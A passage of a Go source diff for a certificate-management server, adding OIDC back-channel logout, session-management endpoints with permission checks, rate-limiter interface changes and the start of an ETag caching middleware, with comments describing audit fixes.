if errors.Is(cerr, repository.ErrBCLJTIAlreadyConsumed) {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"issuer": issuer, "subject": sub, "jti": jti, "outcome": "jti_replayed"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Transient — let the IdP retry.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout_failed", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"issuer": issuer, "subject": sub, "jti": jti, "outcome": "jti_consume_failed", "err": cerr.Error()})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Resolve target sessions:
|
||||||
|
// - sub set: revoke ALL sessions for the actor (oidc_subject lookup).
|
||||||
|
// - sid set: revoke the specific session_id.
|
||||||
|
if sid != "" {
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sid); rerr != nil {
|
||||||
|
// Idempotent at the repo layer; rerr is unlikely. Audit
|
||||||
|
// regardless and return 200 (the IdP shouldn't retry on
|
||||||
|
// our errors).
|
||||||
|
_ = rerr
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sid,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sid", "issuer": issuer, "session_id": sid})
|
||||||
|
} else if sub != "" {
|
||||||
|
// CRIT-2 closure of the 2026-05-10 audit. Pre-fix this branch called
|
||||||
|
// RevokeAllForActor(sub, "User") under the false assumption that
|
||||||
|
// the OIDC subject was used as the actor_id stem. In reality,
|
||||||
|
// internal/auth/oidc/service.go::upsertUser mints
|
||||||
|
// u.ID = "u-" + randomB64URL(16) and stores the OIDC subject in
|
||||||
|
// a separate column, so the pre-fix lookup never found a session
|
||||||
|
// row and the error was silently swallowed. BCL silently revoked
|
||||||
|
// nothing — CWE-613.
|
||||||
|
//
|
||||||
|
// The fix resolves the IdP-signed `iss` claim back to a provider
|
||||||
|
// row via providerRepo.List + IssuerURL filter, then resolves
|
||||||
|
// sub → user.ID via userRepo.GetByOIDCSubject, then revokes all
|
||||||
|
// sessions for that actor. Outcome categories audited:
|
||||||
|
// - revoked (happy path)
|
||||||
|
// - issuer_unknown (iss doesn't match any configured provider)
|
||||||
|
// - user_unknown (provider matched, but no user.id seeded for this subject)
|
||||||
|
// - revoke_failed (DB hiccup at the revoke step)
|
||||||
|
// - provider_lookup_failed / user_lookup_failed → 503 (transient; IdP retries)
|
||||||
|
// All success-shaped outcomes return 200 + Cache-Control: no-store
|
||||||
|
// per OIDC BCL 1.0 §2.7. Transient errors return 503 so the IdP
|
||||||
|
// follows its own retry semantics.
|
||||||
|
providers, plerr := h.providerRepo.List(r.Context(), h.tenantID)
|
||||||
|
if plerr != nil {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "provider_lookup_failed"})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var matched *oidcdomain.OIDCProvider
|
||||||
|
for _, p := range providers {
|
||||||
|
if p.IssuerURL == issuer {
|
||||||
|
matched = p
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if matched == nil {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "issuer_unknown"})
|
||||||
|
// Idempotent — return 200 per spec.
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
user, uerr := h.userRepo.GetByOIDCSubject(r.Context(), matched.ID, sub)
|
||||||
|
if uerr != nil {
|
||||||
|
if errors.Is(uerr, repository.ErrUserNotFound) {
|
||||||
|
// Idempotent: nothing to revoke. IdP may BCL a user we
|
||||||
|
// never logged in. RFC compliance: still 200.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "user_unknown"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Transient — let the IdP retry.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "user_lookup_failed"})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if rerr := h.sessionSvc.RevokeAllForActor(r.Context(), user.ID, string(domain.ActorTypeUser)); rerr != nil {
|
||||||
|
// Revoke failed — BCL is best-effort per §2.8; still 200,
|
||||||
|
// audit the failure.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", user.ID, domain.ActorTypeUser, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "revoke_failed"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", user.ID, domain.ActorTypeUser, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "revoked"})
|
||||||
|
}
|
||||||
|
// Per spec §2.7 — Cache-Control: no-store on success.
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Logout handles POST /auth/logout. Revokes the caller's current
|
||||||
|
// session. Permission: own session (any authenticated caller).
|
||||||
|
func (h *AuthSessionOIDCHandler) Logout(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Resolve the caller's session via the cookie -> Validate path.
|
||||||
|
sessionCookie, cerr := r.Cookie(sessiondomain.PostLoginCookieName)
|
||||||
|
if cerr != nil || sessionCookie.Value == "" {
|
||||||
|
// No cookie => nothing to revoke; treat as success (idempotent).
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
sess, verr := h.sessionSvc.Validate(r.Context(), sessionsvc.ValidateInput{
|
||||||
|
CookieValue: sessionCookie.Value,
|
||||||
|
ClientIP: clientIPFromRequest(r),
|
||||||
|
UserAgent: r.UserAgent(),
|
||||||
|
})
|
||||||
|
if verr != nil {
|
||||||
|
// Cookie is invalid; clear + 204 (idempotent).
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sess.ID); rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Audit 2026-05-11 Fix 13 — HIGH-2 fourth call site. Rotate the CSRF
|
||||||
|
// token on the actor's remaining sessions so a token captured in
|
||||||
|
// this device's browser pre-logout (DevTools, malicious extension,
|
||||||
|
// session-storage leak) can't be replayed against a sibling session
|
||||||
|
// (other browser, other device) after the user logged out here.
|
||||||
|
// The just-revoked session also rotates but its CSRF lookup will
|
||||||
|
// fail at the sessions table's revoked_at IS NOT NULL filter
|
||||||
|
// anyway; rotation on the revoked row is harmless. RotateCSRFTokenForActor
|
||||||
|
// returns the count rotated and NEVER errors — rotation is defense
|
||||||
|
// in depth and must not block the logout success.
|
||||||
|
rotated := h.sessionSvc.RotateCSRFTokenForActor(r.Context(), caller.ActorID, string(caller.ActorType))
|
||||||
|
h.recordAudit(r.Context(), "auth.session_revoked", caller.ActorID, caller.ActorType, sess.ID,
|
||||||
|
map[string]interface{}{"session_id": sess.ID, "self_initiated": true, "csrf_rotated": rotated})
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
@@ -0,0 +1,207 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
sessionsvc "github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
sessiondomain "github.com/certctl-io/certctl/internal/auth/session/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds Section 2 of the original three-section layout:
|
||||||
|
// the SESSION MANAGEMENT handlers (RBAC-gated). Three endpoints:
|
||||||
|
//
|
||||||
|
// GET /api/v1/auth/sessions -> list (own / all-actors)
|
||||||
|
// DELETE /api/v1/auth/sessions/{id} -> revoke (own / any)
|
||||||
|
// DELETE /api/v1/auth/sessions/all-except-current
|
||||||
|
// -> revoke-all-except-current
|
||||||
|
//
|
||||||
|
// The sessionResponse projection type lives here alongside its
|
||||||
|
// callers (sessionToResponse + the three handler methods). It's
|
||||||
|
// the shape the API renders externally; no external caller relies
|
||||||
|
// on its exact file location.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 2. Session management handlers (RBAC-gated).
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// sessionResponse is the JSON shape the session-management endpoints
// render for one session. All timestamps are pre-formatted strings
// (sessionToResponse fills them with RFC 3339 UTC values).
type sessionResponse struct {
	// ID is the session identifier.
	ID string `json:"id"`
	// ActorID and ActorType identify the session's owner.
	ActorID   string `json:"actor_id"`
	ActorType string `json:"actor_type"`
	// IPAddress and UserAgent are omitted from the JSON when empty.
	IPAddress string `json:"ip_address,omitempty"`
	UserAgent string `json:"user_agent,omitempty"`
	// CreatedAt and LastSeenAt are the session's creation and
	// last-activity timestamps.
	CreatedAt  string `json:"created_at"`
	LastSeenAt string `json:"last_seen_at"`
	// IdleExpiresAt and AbsoluteExpiresAt are the session's two expiry
	// deadlines.
	IdleExpiresAt     string `json:"idle_expires_at"`
	AbsoluteExpiresAt string `json:"absolute_expires_at"`
	// Revoked reports whether the session has a revocation timestamp.
	Revoked bool `json:"revoked"`
}
|
||||||
|
|
||||||
|
func sessionToResponse(s *sessiondomain.Session) sessionResponse {
|
||||||
|
return sessionResponse{
|
||||||
|
ID: s.ID,
|
||||||
|
ActorID: s.ActorID,
|
||||||
|
ActorType: s.ActorType,
|
||||||
|
IPAddress: s.IPAddress,
|
||||||
|
UserAgent: s.UserAgent,
|
||||||
|
CreatedAt: s.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
LastSeenAt: s.LastSeenAt.UTC().Format(time.RFC3339),
|
||||||
|
IdleExpiresAt: s.IdleExpiresAt.UTC().Format(time.RFC3339),
|
||||||
|
AbsoluteExpiresAt: s.AbsoluteExpiresAt.UTC().Format(time.RFC3339),
|
||||||
|
Revoked: s.RevokedAt != nil,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListSessions handles GET /api/v1/auth/sessions.
|
||||||
|
//
|
||||||
|
// Default behavior: list current actor's sessions. With
|
||||||
|
// ?actor_id=<other> + auth.session.list.all permission: list that
|
||||||
|
// actor's sessions. The permission check is at the handler layer
|
||||||
|
// (rbacGate at the router gates access to the handler entirely).
|
||||||
|
func (h *AuthSessionOIDCHandler) ListSessions(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Default to the caller's own sessions.
|
||||||
|
actorID := caller.ActorID
|
||||||
|
actorType := string(caller.ActorType)
|
||||||
|
if q := r.URL.Query().Get("actor_id"); q != "" && q != actorID {
|
||||||
|
// Audit 2026-05-10 MED-2 closure — listing a different
|
||||||
|
// actor's sessions requires the narrower auth.session.list.all
|
||||||
|
// permission. The router gate already enforced
|
||||||
|
// auth.session.list (the floor for any session-list call),
|
||||||
|
// but the all-actors variant is an admin-class capability and
|
||||||
|
// must be checked separately because the rbacGate can't see
|
||||||
|
// the query param. When the handler is wired with
|
||||||
|
// WithPermissionChecker (production), we re-check inline; when
|
||||||
|
// it isn't (legacy tests), the router gate's auth.session.list
|
||||||
|
// floor is the only check.
|
||||||
|
if h.checker != nil {
|
||||||
|
ok, perr := h.checker.CheckPermission(r.Context(),
|
||||||
|
caller.ActorID, string(caller.ActorType), h.tenantID,
|
||||||
|
"auth.session.list.all", "global", nil)
|
||||||
|
if perr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "permission check failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if !ok {
|
||||||
|
Error(w, http.StatusForbidden, "auth.session.list.all required to list another actor's sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
actorID = q
|
||||||
|
if at := r.URL.Query().Get("actor_type"); at != "" {
|
||||||
|
actorType = at
|
||||||
|
}
|
||||||
|
}
|
||||||
|
sessions, lerr := h.sessionRepo.ListByActor(r.Context(), actorID, actorType, h.tenantID)
|
||||||
|
if lerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]sessionResponse, 0, len(sessions))
|
||||||
|
for _, s := range sessions {
|
||||||
|
out = append(out, sessionToResponse(s))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"sessions": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeSession handles DELETE /api/v1/auth/sessions/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) RevokeSession(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
sessionID := r.PathValue("id")
|
||||||
|
if sessionID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing session id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Look up the session to enforce "own session OR auth.session.revoke".
|
||||||
|
sess, gerr := h.sessionRepo.Get(r.Context(), sessionID)
|
||||||
|
if gerr != nil {
|
||||||
|
if errors.Is(gerr, repository.ErrSessionNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "session not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not load session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Revoking your own session is always allowed (any authenticated
|
||||||
|
// caller). Revoking someone else's session requires the
|
||||||
|
// auth.session.revoke permission — enforced at the rbacGate the
|
||||||
|
// router wraps this handler with.
|
||||||
|
if sess.ActorID == caller.ActorID && sess.ActorType == string(caller.ActorType) {
|
||||||
|
// own-session path; rbacGate's permission requirement is the
|
||||||
|
// floor; passing through is fine.
|
||||||
|
}
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sessionID); rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.session_revoked", caller.ActorID, caller.ActorType, sessionID,
|
||||||
|
map[string]interface{}{"session_id": sessionID, "target_actor_id": sess.ActorID})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeAllExceptCurrent handles DELETE /api/v1/auth/sessions?except=current.
|
||||||
|
//
|
||||||
|
// Audit 2026-05-10 MED-3 closure — backs the "Sign out all other
|
||||||
|
// sessions" SessionsPage button. Revokes every active session for the
|
||||||
|
// caller EXCEPT the session that issued the current request (so the
|
||||||
|
// user doesn't get logged out by the action they just took).
|
||||||
|
//
|
||||||
|
// The current session ID is read from the request's session cookie via
|
||||||
|
// the SessionMiddleware's actor context — for Bearer-mode callers this
|
||||||
|
// is the empty string and ALL the actor's sessions are revoked (matches
|
||||||
|
// the "log me out everywhere" semantic for API-key-mode users).
|
||||||
|
//
|
||||||
|
// Audit row records the count for compliance (one summary row per
|
||||||
|
// invocation; per-session detail is implicit in the count + actor).
|
||||||
|
func (h *AuthSessionOIDCHandler) RevokeAllExceptCurrent(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if r.URL.Query().Get("except") != "current" {
|
||||||
|
Error(w, http.StatusBadRequest, "only ?except=current is supported")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Current session ID — empty for Bearer/API-key callers (acceptable;
|
||||||
|
// the repo's RevokeAllExceptForActor handles "" by revoking
|
||||||
|
// literally every active session). Read from the session middleware's
|
||||||
|
// SessionFromContext helper which populates the validated session
|
||||||
|
// on the request context for cookie-mode callers.
|
||||||
|
currentSessionID := ""
|
||||||
|
if sess := sessionsvc.SessionFromContext(r.Context()); sess != nil {
|
||||||
|
currentSessionID = sess.ID
|
||||||
|
}
|
||||||
|
|
||||||
|
count, rerr := h.sessionRepo.RevokeAllExceptForActor(r.Context(),
|
||||||
|
caller.ActorID, string(caller.ActorType), h.tenantID, currentSessionID)
|
||||||
|
if rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.sessions_revoked_all_except_current",
|
||||||
|
caller.ActorID, caller.ActorType, currentSessionID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"count": count,
|
||||||
|
"current_session_id": currentSessionID,
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"revoked_count": count})
|
||||||
|
}
|
||||||
@@ -52,7 +52,7 @@ type CertificateService interface {
|
|||||||
// CertificateHandler handles HTTP requests for certificate operations.
|
// CertificateHandler handles HTTP requests for certificate operations.
|
||||||
type CertificateHandler struct {
|
type CertificateHandler struct {
|
||||||
svc CertificateService
|
svc CertificateService
|
||||||
ocspLimiter *ratelimit.SlidingWindowLimiter // production hardening II Phase 3 — per-source-IP cap on OCSP
|
ocspLimiter ratelimit.Limiter // production hardening II Phase 3 — per-source-IP cap on OCSP
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewCertificateHandler creates a new CertificateHandler with a service dependency.
|
// NewCertificateHandler creates a new CertificateHandler with a service dependency.
|
||||||
@@ -65,7 +65,7 @@ func NewCertificateHandler(svc CertificateService) CertificateHandler {
|
|||||||
// cmd/server/main.go): 1000 req/min/IP. Setting to nil disables the
|
// cmd/server/main.go): 1000 req/min/IP. Setting to nil disables the
|
||||||
// limit; the limiter's own NewSlidingWindowLimiter(maxN<=0, ...)
|
// limit; the limiter's own NewSlidingWindowLimiter(maxN<=0, ...)
|
||||||
// also produces a no-op limiter, so the env-var-zero case is safe.
|
// also produces a no-op limiter, so the env-var-zero case is safe.
|
||||||
func (h *CertificateHandler) SetOCSPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *CertificateHandler) SetOCSPRateLimiter(l ratelimit.Limiter) {
|
||||||
h.ocspLimiter = l
|
h.ocspLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -100,13 +100,13 @@ type ESTHandler struct {
|
|||||||
// EST RFC 7030 hardening Phase 3.3: per-handler source-IP rate
|
// EST RFC 7030 hardening Phase 3.3: per-handler source-IP rate
|
||||||
// limiter for FAILED HTTP Basic auth attempts. Keyed by sourceIP so
|
// limiter for FAILED HTTP Basic auth attempts. Keyed by sourceIP so
|
||||||
// a hostile network segment can't burn through the password.
|
// a hostile network segment can't burn through the password.
|
||||||
failedBasicLimiter *ratelimit.SlidingWindowLimiter
|
failedBasicLimiter ratelimit.Limiter
|
||||||
|
|
||||||
// EST RFC 7030 hardening Phase 4.2: per-handler per-principal sliding-
|
// EST RFC 7030 hardening Phase 4.2: per-handler per-principal sliding-
|
||||||
// window rate limit. Keyed by (CSR-CN, sourceIP) so a stolen
|
// window rate limit. Keyed by (CSR-CN, sourceIP) so a stolen
|
||||||
// bootstrap cert AND a known device CN can't be used to flood the
|
// bootstrap cert AND a known device CN can't be used to flood the
|
||||||
// issuer. Disabled when nil; configured per-profile.
|
// issuer. Disabled when nil; configured per-profile.
|
||||||
perPrincipalLimiter *ratelimit.SlidingWindowLimiter
|
perPrincipalLimiter ratelimit.Limiter
|
||||||
|
|
||||||
// labelForLog gives observability code a per-profile string to
|
// labelForLog gives observability code a per-profile string to
|
||||||
// include in audit log lines / Prometheus labels. Defaults to
|
// include in audit log lines / Prometheus labels. Defaults to
|
||||||
@@ -170,7 +170,7 @@ func (h *ESTHandler) SetEnrollmentPassword(pw string) { h.basicPassword = pw }
|
|||||||
// rate limiter. Phase 3.3. Disabled when nil — but Validate() at
|
// rate limiter. Phase 3.3. Disabled when nil — but Validate() at
|
||||||
// startup refuses an enabled basic-auth profile without a configured
|
// startup refuses an enabled basic-auth profile without a configured
|
||||||
// limiter, so a real deploy always wires one.
|
// limiter, so a real deploy always wires one.
|
||||||
func (h *ESTHandler) SetSourceIPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ESTHandler) SetSourceIPRateLimiter(l ratelimit.Limiter) {
|
||||||
h.failedBasicLimiter = l
|
h.failedBasicLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -179,7 +179,7 @@ func (h *ESTHandler) SetSourceIPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
|||||||
// every successful enrollment, NOT just failures — the goal is to
|
// every successful enrollment, NOT just failures — the goal is to
|
||||||
// bound enrollment-flooding from a compromised credential, not just
|
// bound enrollment-flooding from a compromised credential, not just
|
||||||
// failed-auth brute force.
|
// failed-auth brute force.
|
||||||
func (h *ESTHandler) SetPerPrincipalRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ESTHandler) SetPerPrincipalRateLimiter(l ratelimit.Limiter) {
|
||||||
h.perPrincipalLimiter = l
|
h.perPrincipalLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ type ExportService interface {
|
|||||||
// ExportHandler handles HTTP requests for certificate export operations.
|
// ExportHandler handles HTTP requests for certificate export operations.
|
||||||
type ExportHandler struct {
|
type ExportHandler struct {
|
||||||
svc ExportService
|
svc ExportService
|
||||||
exportLimiter *ratelimit.SlidingWindowLimiter // production hardening II Phase 3
|
exportLimiter ratelimit.Limiter // production hardening II Phase 3
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewExportHandler creates a new ExportHandler with a service dependency.
|
// NewExportHandler creates a new ExportHandler with a service dependency.
|
||||||
@@ -40,7 +40,7 @@ func NewExportHandler(svc ExportService) ExportHandler {
|
|||||||
// Production hardening II Phase 3. Default cap (when set in
|
// Production hardening II Phase 3. Default cap (when set in
|
||||||
// cmd/server/main.go): 50 exports/hr/operator. Setting to nil
|
// cmd/server/main.go): 50 exports/hr/operator. Setting to nil
|
||||||
// disables the limit.
|
// disables the limit.
|
||||||
func (h *ExportHandler) SetExportRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *ExportHandler) SetExportRateLimiter(l ratelimit.Limiter) {
|
||||||
h.exportLimiter = l
|
h.exportLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,291 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package middleware
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"crypto/sha256"
|
||||||
|
"encoding/hex"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-L2 closure (2026-05-14): ETag / If-None-Match
|
||||||
|
// middleware for read-heavy list endpoints.
|
||||||
|
//
|
||||||
|
// Pre-Phase-6 every GET /api/v1/{certificates,jobs,agents,audit,
|
||||||
|
// discovery/certificates} request walked the full pagination path
|
||||||
|
// including a `SELECT COUNT(*) FROM <table> WHERE ...` query for
|
||||||
|
// the metadata block. The dashboard's polling loop alone hits these
|
||||||
|
// endpoints every 30s; on a 50K-cert fleet that's ~14K COUNT(*)
|
||||||
|
// rows scanned per minute for a result the operator hasn't actually
|
||||||
|
// changed.
|
||||||
|
//
|
||||||
|
// This middleware sits in front of the handler and:
|
||||||
|
//
|
||||||
|
// 1. Lets the handler run normally (writing JSON to a response
|
||||||
|
// buffer rather than the wire).
|
||||||
|
// 2. Computes a SHA-256 ETag of the buffered response body. The
|
||||||
|
// ETag is deterministic over (body bytes), so when the
|
||||||
|
// underlying list contents are unchanged the ETag is the same
|
||||||
|
// regardless of which replica served the request.
|
||||||
|
// 3. Compares the computed ETag against the request's
|
||||||
|
// `If-None-Match` header. Match → write 304 Not Modified with
|
||||||
|
// an empty body. No match → write the full response with the
|
||||||
|
// `ETag:` header set so the client can store it for the next
|
||||||
|
// request.
|
||||||
|
//
|
||||||
|
// Constraints / non-goals:
|
||||||
|
//
|
||||||
|
// - GET / HEAD only. POST / PUT / DELETE bypass the middleware
|
||||||
|
// (ETags on mutations introduce cache-correctness bugs around
|
||||||
|
// the request body not matching the response body).
|
||||||
|
// - Non-2xx responses (4xx errors, 5xx) bypass the ETag
|
||||||
|
// computation. The handler's error responses go through
|
||||||
|
// unchanged.
|
||||||
|
// - Responses larger than maxETagBufferBytes (64 KiB) skip the
|
||||||
|
// hash. Buffering very large response bodies in-memory just to
|
||||||
|
// hash them would cost more than the cache win. The default
|
||||||
|
// covers the cursor-paginated 100-row default on every list
|
||||||
|
// endpoint; raising the page-size override could exceed the
|
||||||
|
// limit, in which case ETag silently degrades to "no caching"
|
||||||
|
// for those calls.
|
||||||
|
// - The hash is computed over the response body bytes, NOT over
|
||||||
|
// a (max-updated-at, row-count) tuple from the DB. This is the
|
||||||
|
// less-clever-but-more-correct choice: any response-shape
|
||||||
|
// change (a new field added by a handler refactor, locale
|
||||||
|
// formatting drift, ordering shuffles) produces a fresh ETag
|
||||||
|
// automatically without requiring per-endpoint metadata
|
||||||
|
// wiring. The cost is one SHA-256 pass over the response body
|
||||||
|
// per request, which is dwarfed by the JSON marshaling cost
|
||||||
|
// already in the path.
|
||||||
|
|
||||||
|
// maxETagBufferBytes is the upper bound, in bytes, on how much of a
// response body the ETag middleware holds in memory for hashing:
// 64 KiB. Per the sizing note that accompanies this constant, that
// covers a 100-row cursor page at roughly 500 bytes of JSON per row.
// A response that would grow past this limit is streamed to the client
// without an ETag.
const maxETagBufferBytes = 64 << 10
|
||||||
|
|
||||||
|
// ETag returns middleware that emits a strong ETag header on
|
||||||
|
// successful GET / HEAD responses and short-circuits 304 Not
|
||||||
|
// Modified on If-None-Match match. Use it by wrapping the handler
|
||||||
|
// chain in front of the list endpoints:
|
||||||
|
//
|
||||||
|
// mux.Handle("GET /api/v1/certificates", middleware.ETag(h.ListCertificates))
|
||||||
|
//
|
||||||
|
// Or per router-registration if the router supports method-aware
|
||||||
|
// wrapping; see internal/api/router/router.go for the wiring shape.
|
||||||
|
func ETag(next http.Handler) http.Handler {
|
||||||
|
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
// Only GET + HEAD benefit. POST/PUT/DELETE always run.
|
||||||
|
if r.Method != http.MethodGet && r.Method != http.MethodHead {
|
||||||
|
next.ServeHTTP(w, r)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Buffer the handler's response. The handler still calls
|
||||||
|
// w.WriteHeader / w.Write normally; the recorder captures
|
||||||
|
// the bytes + status code for the post-handler ETag pass.
|
||||||
|
rec := &etagRecorder{
|
||||||
|
ResponseWriter: w,
|
||||||
|
body: bytes.NewBuffer(nil),
|
||||||
|
status: http.StatusOK,
|
||||||
|
headerWritten: false,
|
||||||
|
}
|
||||||
|
next.ServeHTTP(rec, r)
|
||||||
|
|
||||||
|
// Only successful responses get cached. 304s never reach
|
||||||
|
// here (we'd be short-circuiting BEFORE the handler ran).
|
||||||
|
// 4xx / 5xx responses pass through unchanged because the
|
||||||
|
// handler's error body shouldn't be cached against an
|
||||||
|
// ETag.
|
||||||
|
if rec.status < 200 || rec.status >= 300 {
|
||||||
|
rec.flush()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Skip ETag pass for over-sized responses. The buffer cap
|
||||||
|
// caught the body; emitting it without an ETag is the
|
||||||
|
// degradation path.
